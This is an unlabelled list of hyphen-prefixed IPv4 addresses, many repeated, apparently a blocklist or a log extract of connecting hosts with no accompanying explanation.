-111.26.164.22 -101.70.66.51 -111.26.164.22 -111.26.164.22 -218.245.4.3 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -59.153.93.71 -221.7.113.46 -183.166.129.196 -123.118.88.167 -111.26.164.22 -183.158.24.35 -59.153.93.84 -111.26.164.22 -111.26.164.22 -113.88.120.105 -60.189.100.169 -183.14.76.193 -111.26.164.22 -14.215.245.162 -111.26.164.22 -117.115.103.228 -111.26.164.22 -111.26.164.22 -113.87.161.16 -111.26.164.22 -111.26.164.22 -221.123.135.37 -111.26.164.22 -111.26.164.22 -113.116.17.185 -113.73.13.189 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -211.141.195.142 -119.129.115.43 -111.26.164.22 -111.26.164.22 -121.225.172.144 -59.42.88.238 -183.27.180.12 -115.219.4.37 -111.164.172.116 -39.77.219.114 -220.168.55.213 -61.163.95.190 -111.26.164.22 -120.79.70.211 -121.201.56.166 -111.26.164.22 -125.46.40.227 -111.26.164.22 -125.107.163.185 -47.110.240.159 -111.26.164.22 -183.148.226.25 -218.24.173.4 -183.138.145.139 -111.26.164.22 -122.245.82.153 -111.39.46.57 -112.31.24.80 -222.212.185.166 -111.26.164.22 -111.26.164.22 -115.195.185.228 -59.46.68.209 -111.26.164.22 -111.26.164.22 -183.136.119.21 -123.155.64.64 -118.113.146.221 -111.26.164.22 -111.26.164.22 -125.71.149.208 -111.26.164.22 -113.116.15.216 -113.88.250.18 -125.89.33.224 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -183.15.179.146 -219.148.89.88 -49.65.112.94 -222.210.108.167 -59.67.97.213 -113.88.253.250 -111.26.164.22 -121.235.92.118 -183.156.215.246 -112.27.135.88 -60.162.163.160 -111.26.164.22 -47.98.130.107 -111.26.164.22 -111.26.164.22 -125.71.247.52 -113.116.126.177 -113.87.161.242 -113.105.203.53 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -113.103.39.92 -59.153.93.87 -113.196.137.35 -111.26.164.22 -123.150.9.78 -113.110.201.234 -111.26.164.22 -112.30.53.73 -111.26.164.22 -111.26.164.22 -115.217.143.126 -59.42.88.220 -14.155.221.230 -121.4.93.224 -111.26.164.22 -111.26.164.22 -183.49.86.229 -183.138.149.109 -211.144.105.117 -211.144.105.118 -117.50.41.86 -116.25.37.149 -113.73.14.189 -222.79.37.190 -210.76.97.217 -58.247.111.14 -220.166.242.224 -111.26.164.22 -111.26.164.22 -182.150.57.94 -183.149.242.24 -60.6.198.170 -221.178.146.145 -116.24.65.23 -183.143.28.170 -111.26.164.22 -118.112.98.11 -222.223.55.134 -183.49.45.120 -183.149.240.116 -111.26.164.22 -111.26.164.22 -122.245.85.151 -220.191.69.126 -113.116.90.96 -111.162.89.155 -47.94.175.134 -59.153.93.87 -210.243.86.27 -106.13.81.180 -120.237.175.237 -61.190.14.50 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -180.117.160.177 -154.8.226.228 -111.26.164.22 -222.187.120.92 -60.189.118.51 -114.242.79.203 -219.148.89.89 -121.225.7.33 -218.61.46.117 -58.221.62.91 -61.184.25.178 -220.178.31.152 -111.26.164.22 -111.26.164.22 -118.190.73.166 -115.219.7.216 -183.136.109.6 -222.192.128.53 -111.26.164.22 -111.26.164.22 -113.90.239.188 -159.75.215.59 -111.26.164.22 -111.26.164.22 -222.95.174.95 -111.26.164.22 -182.245.143.27 -111.26.164.22 -111.26.164.22 -115.219.6.68 -111.26.164.22 -111.26.164.22 -123.159.113.252 -119.23.29.206 -113.73.14.190 -60.12.83.7 -119.146.237.210 -218.75.130.249 -112.255.251.2 -111.26.164.22 -115.221.138.94 -183.63.85.92 -183.49.86.100 -220.191.56.158 -210.72.20.202 -111.26.164.22 -58.220.232.9 -111.26.164.22 -112.30.140.106 -180.163.179.114 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -58.213.113.39 -111.26.164.22 -112.115.17.188 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -14.215.233.234 -113.102.144.30 -183.138.157.176 -58.244.247.22 -61.166.162.229 -119.1.235.135 -111.26.164.22 -101.231.0.82 -222.223.55.134 -183.14.79.91 -222.209.81.41 -39.77.216.205 -117.27.144.100 -220.166.240.204 -111.26.164.22 -112.27.224.188 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -123.234.200.7 -111.26.164.22 -202.205.161.186 -113.89.34.145 -111.26.164.22 -211.103.218.82 -111.22.3.157 -111.22.3.150 -111.26.164.22 -114.116.123.177 -111.26.164.22 -180.168.136.214 -180.168.136.220 -111.26.164.22 -222.216.6.172 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.12.120.11 -119.23.224.76 -111.26.164.22 -111.26.164.22 -59.75.8.103 -222.77.183.40 -61.143.243.59 -101.231.208.166 -113.90.179.44 -111.26.164.22 -111.26.164.22 -61.143.243.59 -111.26.164.22 -61.143.243.59 -111.26.164.22 -218.84.127.245 -61.143.243.59 -111.26.164.22 -115.195.186.78 -61.143.243.59 -61.143.243.59 -111.26.164.22 -106.52.41.23 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -59.42.89.172 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -211.103.218.82 -61.143.243.59 -111.26.164.22 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -183.15.90.164 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -222.223.55.134 -61.143.243.59 -101.72.131.195 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -221.220.105.180 -111.26.164.22 -61.143.243.59 -125.107.174.127 -110.88.153.41 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -111.38.109.34 -61.143.243.59 -61.143.243.59 -61.143.243.59 -110.80.1.70 -120.209.123.77 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -210.41.236.202 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -125.67.125.234 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -60.189.116.1 -111.26.164.22 -61.143.243.59 -49.65.115.29 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -116.7.74.221 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -123.234.200.7 -60.162.17.124 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -120.237.94.226 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -222.180.164.81 -61.143.243.59 -61.143.243.59 -61.143.243.59 -122.243.220.254 -61.143.243.59 -114.35.105.33 -111.26.164.22 -61.143.243.59 -122.245.158.175 -61.143.243.59 -61.143.243.59 -219.132.156.20 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -202.199.225.6 -61.143.243.59 -61.166.162.92 -61.143.243.59 -111.26.164.22 -61.143.243.59 -111.26.164.22 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -183.143.24.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -115.202.34.208 -59.42.228.218 -61.143.243.59 -61.143.243.59 -61.143.243.59 -60.189.115.69 -61.143.243.59 -113.110.200.145 -61.143.243.59 -111.26.164.22 -139.219.2.203 -61.143.243.59 -211.136.182.26 -61.143.243.59 -60.189.125.127 -61.143.243.59 -61.143.243.59 -115.219.5.33 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -111.26.164.22 -111.26.164.22 -61.143.243.59 -113.73.14.204 -61.143.243.59 -113.88.107.105 -122.245.87.229 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -218.4.157.206 -61.143.243.59 -61.143.243.59 -61.143.243.59 -183.158.29.170 -113.105.202.90 -61.143.243.59 -61.143.243.59 -61.143.243.59 -223.68.177.142 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -111.26.164.22 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -110.87.25.101 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -115.174.67.64 -61.143.243.59 -61.143.243.59 -81.69.176.117 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -119.181.179.144 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.134.38.1 -61.143.243.59 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -125.89.33.252 -61.143.243.59 -61.143.243.59 -61.143.243.59 -59.42.90.49 -123.159.115.172 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -219.148.89.89 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -116.7.73.157 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.130.226.145 -61.143.243.59 -61.143.243.59 -180.167.145.169 -222.77.183.74 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -111.26.164.22 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -49.65.115.94 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -183.27.180.118 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -115.221.142.137 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -220.166.243.225 -113.88.103.253 -61.143.243.59 -183.129.143.186 -61.143.243.59 -116.24.66.164 -61.143.243.59 -61.143.243.59 -116.7.72.84 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -218.73.48.157 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -125.89.32.233 -61.143.243.59 -121.4.73.14 -61.143.243.59 -61.143.243.59 -113.81.201.30 -61.143.243.59 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -116.62.210.27 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -111.26.164.22 -111.26.164.22 -61.143.243.59 -113.110.202.188 -61.143.243.59 -61.143.243.59 -61.143.243.59 -180.140.74.138 -61.143.243.59 -61.143.243.59 -61.143.243.59 -113.105.203.122 -61.143.243.59 -61.143.243.59 -61.143.243.59 -110.249.133.136 -61.143.243.59 -61.143.243.59 -61.143.243.59 -116.3.199.169 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -121.250.80.7 -61.143.243.59 -61.143.243.59 -61.143.243.59 -49.65.113.30 -111.26.164.22 -61.143.243.59 -218.89.108.203 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -183.62.232.110 -61.143.243.59 -47.112.247.175 -61.143.243.59 -121.15.129.210 -61.143.243.59 -61.143.243.59 -120.0.225.120 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -103.36.90.58 -61.143.243.59 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -121.199.13.107 -111.26.164.22 -106.122.199.112 -61.143.243.59 -61.143.33.114 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -122.224.216.85 -61.143.243.59 -183.27.182.16 -61.143.243.59 -61.143.243.59 -61.143.243.59 -218.22.139.50 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -36.26.229.105 -183.138.146.174 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.144.227.205 -61.143.243.59 -60.189.103.189 -61.143.243.59 -61.143.243.59 -61.143.243.59 -123.130.118.55 -125.113.188.249 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -220.187.151.75 -61.143.243.59 -101.200.78.185 -61.143.243.59 -111.26.164.22 -111.26.164.22 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -111.26.164.22 -61.143.243.59 -183.63.182.188 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -111.26.164.22 -60.177.7.48 -61.143.243.59 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -103.250.249.76 -61.143.243.59 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -113.110.167.77 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -111.26.164.22 -61.143.243.59 -111.26.164.22 -61.143.243.59 -61.143.243.59 -111.166.94.136 -61.143.243.59 -61.143.243.59 -60.173.113.172 -39.108.60.194 -61.143.243.59 -61.143.243.59 -113.116.124.219 -113.73.15.123 -111.26.164.22 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -61.143.243.59 -183.15.177.173 -101.132.109.104 -111.26.164.22 -210.51.21.9 -123.155.66.89 -103.200.5.15 -183.149.254.150 -39.88.93.37 -60.176.60.164 -111.26.164.22 -120.76.70.39 -43.255.88.130 -220.166.243.209 -61.166.162.215 -111.26.164.22 -36.26.229.181 -113.116.127.241 -183.149.240.193 -113.116.126.234 -111.26.164.22 -114.214.87.91 -111.26.164.22 -116.30.199.1 -220.163.118.121 -111.26.164.22 -111.26.164.22 -116.24.188.72 -49.65.113.66 -111.26.164.22 -123.124.30.227 -183.27.183.240 -101.200.78.185 -221.178.146.153 -111.26.164.22 -115.221.143.74 -43.255.88.185 -221.226.194.216 -218.17.117.53 -113.73.14.81 -113.88.104.91 -111.26.164.22 -113.91.248.127 -202.103.39.226 -183.49.44.102 -183.128.147.16 -111.26.164.22 -116.236.163.125 -111.26.164.22 -61.189.223.215 -58.219.31.14 -112.30.195.52 -115.174.67.77 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -119.147.209.164 -123.130.118.55 -119.129.117.221 -111.26.164.22 -27.184.35.56 -123.155.66.89 -171.104.120.154 -111.160.193.242 -113.116.150.42 -111.26.164.22 -111.26.164.22 -122.224.120.93 -60.27.253.189 -222.223.55.134 -111.26.164.22 -118.114.243.129 -183.157.104.42 -121.41.11.196 -106.55.38.105 -103.36.90.58 -111.26.164.22 -111.26.164.22 -14.155.220.164 -183.47.13.2 -111.164.181.137 -123.127.191.36 -118.213.88.62 -43.255.181.169 -103.200.5.15 -218.95.182.124 -113.105.201.179 -113.87.160.43 -122.195.52.148 -111.26.164.22 -106.89.165.207 -121.41.11.196 -112.92.40.68 -111.26.164.22 -180.140.75.33 -111.26.164.22 -183.230.44.157 -112.226.139.173 -120.209.156.245 -221.215.119.113 -220.184.123.200 -111.26.164.22 -111.26.164.22 -111.26.164.22 -60.6.205.41 -121.225.7.74 -116.7.75.184 -112.226.13.128 -111.26.164.22 -49.233.53.88 -111.26.164.22 -183.15.88.211 -103.200.5.15 -59.75.8.103 -111.26.164.22 -103.200.5.15 -111.26.164.22 -218.73.72.196 -113.105.201.244 -47.102.42.98 -40.73.77.199 -123.130.118.55 -111.26.164.22 -183.14.77.34 -183.49.44.220 -43.255.181.144 -118.242.3.90 -113.73.14.172 -101.65.81.215 -116.128.228.13 -113.118.44.250 -113.110.201.79 -27.151.53.156 -111.40.118.13 -124.112.49.16 -113.116.18.249 -111.38.109.35 -113.116.135.108 -111.26.164.22 -218.242.168.131 -113.116.127.28 -218.95.245.10 -113.105.202.204 -111.26.164.22 -111.26.164.22 -111.26.164.22 -220.166.242.66 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -218.73.77.99 -101.70.64.12 -125.120.240.15 -111.26.164.22 -111.26.164.22 -36.26.230.141 -117.28.121.136 -113.116.132.178 -111.26.164.22 -111.26.164.22 -171.104.121.51 -111.26.164.22 -111.26.164.22 -125.89.32.213 -121.4.146.134 -220.174.25.62 -210.51.21.33 -103.200.5.15 -111.26.164.22 -218.241.213.63 -111.26.164.22 -60.189.101.160 -218.73.39.180 -116.24.188.70 -111.26.164.22 -111.38.40.76 -183.149.229.200 -111.38.109.34 -111.26.164.22 -111.38.109.32 -115.208.187.40 -111.33.35.87 -115.174.67.67 -111.26.164.22 -59.42.89.139 -218.17.149.61 -39.75.77.247 -202.105.247.37 -220.165.92.134 -111.26.164.22 -115.219.72.217 -59.39.146.141 -112.255.71.217 -59.42.61.125 -116.24.64.155 -111.26.164.22 -183.136.112.153 -111.26.164.22 -111.26.164.22 -47.99.209.166 -111.26.164.22 -112.115.17.117 -115.219.232.141 -116.30.194.241 -202.101.126.250 -111.26.164.22 -111.26.164.22 -220.170.15.48 -14.126.205.101 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -121.61.118.56 -111.26.164.22 -61.190.27.61 -111.26.164.22 -58.221.244.82 -220.166.243.51 -222.222.167.142 -111.26.164.22 -120.26.199.26 -110.240.156.252 -39.108.114.247 -60.162.160.210 -113.116.17.180 -111.26.164.22 -111.26.164.22 -113.73.13.211 -14.155.220.112 -111.26.164.22 -43.255.183.147 -113.69.137.35 -183.14.76.150 -111.26.164.22 -111.26.164.22 -111.26.164.22 -113.110.187.62 -111.26.164.22 -43.255.181.162 -111.26.164.22 -43.255.181.163 -111.26.164.22 -183.136.108.187 -111.26.164.22 -221.197.109.85 -111.26.164.22 -202.70.1.50 -36.25.163.161 -111.26.164.22 -211.75.183.12 -111.26.164.22 -113.116.125.243 -113.116.132.41 -115.174.67.34 -111.26.164.22 -117.81.63.168 -111.26.164.22 -223.68.177.142 -111.26.164.22 -121.4.151.152 -14.155.223.99 -111.26.164.22 -122.112.221.169 -111.26.164.22 -118.113.132.65 -111.26.164.22 -111.26.164.22 -116.7.74.151 -115.202.63.75 -171.104.120.152 -221.226.194.67 -111.26.164.22 -111.26.164.22 -111.26.164.22 -115.219.239.46 -113.116.133.111 -122.245.81.208 -111.26.164.22 -113.110.202.54 -218.73.75.28 -113.116.171.232 -125.38.43.82 -218.22.88.141 -101.96.130.115 -111.26.164.22 -111.229.197.207 -220.166.243.2 -116.7.72.44 -43.255.183.189 -183.14.78.52 -43.255.183.182 -111.26.164.22 -113.105.203.195 -111.26.164.22 -61.51.136.233 -47.96.239.112 -59.42.91.217 -101.70.64.23 -220.166.242.190 -47.114.82.37 -110.249.208.216 -182.138.194.226 -27.214.212.151 -36.25.166.155 -111.38.40.64 -111.26.164.22 -43.255.88.183 -121.11.16.130 -113.105.201.197 -122.243.147.129 -221.215.170.67 -111.26.164.22 -111.164.183.10 -120.79.88.28 -122.240.164.23 -221.209.38.44 -125.112.106.3 -113.116.126.4 -60.28.117.200 -49.65.113.142 -60.162.160.10 -125.125.33.139 -61.179.145.188 -103.200.5.15 -115.221.143.94 -103.200.5.15 -222.222.234.151 -14.155.221.137 -39.65.71.183 -103.200.5.15 -111.26.164.22 -218.28.220.122 -183.62.56.92 -111.26.164.22 -111.26.164.22 -113.102.140.27 -113.89.34.10 -117.28.121.96 -115.219.6.15 -113.88.104.117 -222.186.144.65 -180.109.34.93 -221.209.11.88 -122.232.125.166 -111.26.164.22 -59.75.8.196 -111.26.164.22 -183.143.94.81 -159.75.3.209 -220.185.205.2 -111.26.164.22 -120.209.31.34 -123.159.49.206 -121.235.92.19 -116.7.74.47 -36.26.207.10 -106.89.161.132 -119.129.119.93 -110.87.25.116 -101.70.64.40 -61.174.145.42 -111.26.164.22 -101.70.64.40 -220.184.32.71 -1.60.221.80 -211.103.8.39 -59.42.230.190 -61.149.143.78 -115.202.156.0 -115.202.61.57 -111.26.164.22 -111.26.164.22 -221.10.27.123 -27.151.53.156 -119.129.118.96 -183.159.42.243 -111.26.164.22 -211.139.10.222 -220.166.243.78 -111.26.164.22 -183.143.11.33 -111.26.164.22 -115.216.143.203 -180.140.74.95 -59.42.231.248 -183.149.230.233 -183.63.72.81 -220.184.36.141 -221.209.11.66 -111.26.164.22 -61.139.31.171 -14.155.222.243 -47.93.12.194 -119.129.119.223 -183.49.47.219 -182.92.119.121 -220.179.232.150 -125.107.163.220 -123.155.68.81 -183.155.192.154 -139.217.218.205 -125.120.240.47 -111.164.172.142 -101.200.212.88 -111.26.164.22 -221.178.190.170 -116.236.90.146 -183.49.46.7 -218.3.129.15 -113.104.207.21 -111.26.164.22 -49.72.133.30 -103.200.5.15 -124.129.108.38 -111.26.164.22 -183.14.77.214 -111.26.164.22 -113.88.252.122 -113.116.171.54 -116.54.81.70 -183.143.89.99 -183.62.56.92 -220.166.242.40 -59.42.91.48 -123.159.8.183 -124.205.42.227 -61.149.143.78 -113.110.201.139 -113.88.119.187 -113.107.155.227 -60.189.103.20 -47.102.117.189 -180.109.38.74 -111.47.243.243 -111.163.182.22 -171.104.121.156 -124.117.209.110 -103.200.5.15 -115.203.27.186 -113.88.24.32 -111.26.164.22 -111.26.164.22 -183.149.231.147 -113.105.201.48 -111.26.164.22 -115.221.139.27 -183.49.44.145 -183.155.80.229 -113.103.38.11 -112.54.44.17 -59.42.61.240 -103.200.5.15 -122.232.124.166 -47.112.220.193 -115.218.127.12 -111.26.164.22 -111.26.164.22 -113.88.101.56 -111.26.164.22 -39.97.169.189 -111.26.164.22 -122.245.86.178 -36.7.137.30 -171.104.120.57 -123.155.68.176 -111.26.164.22 -113.116.171.77 -221.2.140.170 -218.94.158.182 -111.199.175.59 -113.73.12.124 -47.101.213.116 -222.173.63.247 -120.79.206.102 -111.26.164.22 -122.233.96.155 -183.157.107.105 -113.73.12.229 -106.89.167.163 -113.116.18.30 -113.102.143.79 -115.221.137.204 -116.228.86.166 -111.26.164.22 -111.164.180.237 -111.26.164.22 -115.202.145.166 -113.88.100.167 -222.77.183.205 -103.36.90.58 -221.2.140.170 -113.116.171.2 -202.100.77.221 -59.42.60.176 -120.253.2.98 -221.230.54.150 -101.93.157.10 -121.10.20.178 -218.74.206.24 -101.231.34.92 -122.243.217.252 -113.116.12.47 -60.248.116.194 -115.198.123.74 -111.38.56.3 -60.12.9.130 -182.245.143.232 -222.221.228.229 -112.112.90.178 -210.177.85.137 -115.206.176.179 -106.89.164.117 -222.223.55.134 -115.219.239.81 -59.32.199.142 -121.14.8.33 -113.87.161.62 -103.200.5.15 -122.227.166.54 -111.26.164.22 -180.109.38.210 -60.28.117.206 -221.209.37.58 -113.116.125.77 -111.26.164.22 -111.26.164.22 -61.142.80.37 -182.141.234.74 -113.102.146.114 -115.174.67.104 -101.83.116.11 -125.89.34.204 -113.104.204.121 -183.136.101.253 -220.184.116.202 -222.174.201.210 -122.225.73.38 -113.116.156.140 -111.26.164.22 -60.190.55.50 -103.200.5.15 -42.247.20.147 -111.26.164.22 -153.99.241.238 -111.26.164.22 -183.64.214.57 -139.196.198.125 -61.55.148.233 -123.159.112.112 -112.27.100.207 -222.66.189.42 -218.28.68.162 -113.88.24.138 -111.26.164.22 -47.112.206.48 -60.162.162.6 -221.196.46.74 -183.49.47.39 -101.231.0.82 -113.116.1.169 -122.245.233.3 -222.66.189.42 -14.215.216.130 -103.200.5.15 -221.193.245.86 -58.37.224.207 -59.70.207.214 -183.128.150.55 -110.240.229.232 -111.26.164.22 -119.129.113.187 -61.55.148.233 -171.88.103.208 -101.83.117.74 -111.26.164.22 -111.26.164.22 -113.108.204.252 -101.70.64.82 -111.206.131.22 -183.136.114.169 -111.62.32.85 -112.255.249.191 -113.105.152.168 -111.164.178.253 -60.162.163.202 -47.106.81.250 -49.64.188.187 -103.200.5.15 -222.175.94.102 -115.204.236.187 -122.240.175.25 -119.127.17.78 -1.119.198.42 -220.191.66.118 -221.226.192.157 -120.77.58.76 -103.200.5.15 -60.164.173.229 -111.26.164.22 -58.242.4.24 -60.28.117.207 -60.28.117.206 -59.175.169.2 -111.26.164.22 -120.209.60.92 -113.110.202.105 -112.226.136.228 -183.49.47.53 -112.111.2.14 -58.216.193.106 -111.26.164.22 -218.84.187.102 -113.110.203.48 -117.29.167.138 -183.149.236.150 -220.160.52.54 -125.221.35.30 -115.203.206.119 -61.164.65.158 -116.255.166.176 -119.29.16.91 -60.189.100.251 -59.42.91.216 -116.7.73.101 -120.79.223.91 -180.109.32.10 -101.70.66.62 -117.71.50.8 -111.26.164.22 -111.26.164.22 -113.88.124.103 -118.190.73.166 -101.231.126.196 -210.242.49.250 -222.28.16.139 -124.127.38.139 -122.234.20.120 -221.210.146.29 -183.149.236.252 -221.209.120.119 -43.255.183.191 -43.255.183.180 -43.255.183.162 -43.255.183.169 -119.181.219.94 -218.1.100.233 -219.232.206.146 -211.103.34.225 -122.227.166.54 -171.8.6.111 -183.146.96.35 -111.26.164.22 -124.127.38.139 -14.155.222.247 -111.26.164.22 -47.98.169.66 -125.114.245.253 -59.108.121.171 -202.101.147.71 -58.135.78.35 -210.51.21.34 -59.108.121.171 -111.26.164.22 -210.36.240.21 -202.104.18.87 -111.26.164.22 -115.219.232.54 -125.73.131.136 -111.59.84.4 -116.25.133.196 -111.26.164.22 -218.4.96.188 -103.200.5.15 -111.26.164.22 -118.113.146.15 -122.240.169.4 -219.232.206.146 -221.239.26.75 -111.164.175.77 -61.138.233.22 -118.213.88.62 -111.26.164.22 -111.26.164.22 -113.88.124.90 -111.26.164.22 -113.92.166.169 -183.15.91.189 -222.28.16.139 -111.59.86.7 -49.64.188.193 -114.84.25.214 -125.125.25.112 -115.218.124.225 -124.160.109.139 -125.71.149.64 -116.7.74.234 -125.122.109.124 -210.51.21.107 -183.15.177.42 -180.109.146.72 -113.105.203.189 -111.26.164.22 -223.113.100.186 -60.190.238.110 -163.179.127.68 -113.104.217.20 -113.118.45.118 -113.90.179.110 -153.99.240.152 -113.87.89.229 -120.24.41.99 -125.107.181.80 -125.89.35.20 -202.205.160.203 -220.189.251.226 -116.30.196.57 -115.219.237.35 -119.129.117.227 -60.29.162.19 -220.166.243.38 -218.241.213.63 -120.24.47.41 -110.86.5.142 -123.234.222.112 -210.28.231.181 -223.112.164.26 -118.113.147.140 -125.89.35.99 -60.27.253.125 -61.141.138.176 -115.174.67.85 -183.149.230.242 -221.210.146.29 -113.116.88.251 -122.230.249.240 -60.172.0.38 -113.106.108.42 -27.151.53.156 -220.249.204.70 -103.200.5.15 -112.27.34.23 -112.112.90.213 -121.43.225.67 -60.28.117.201 -60.28.117.209 -171.104.120.25 -111.26.164.22 -111.26.164.22 -116.30.198.0 -114.253.176.248 -111.26.164.22 -103.36.90.54 -124.78.251.110 -183.138.184.75 -120.77.93.158 -113.116.91.104 -111.26.164.22 -183.14.77.31 -121.224.210.36 -183.14.77.145 -112.64.187.70 -210.176.89.51 -171.217.83.58 -120.232.160.135 -113.110.185.114 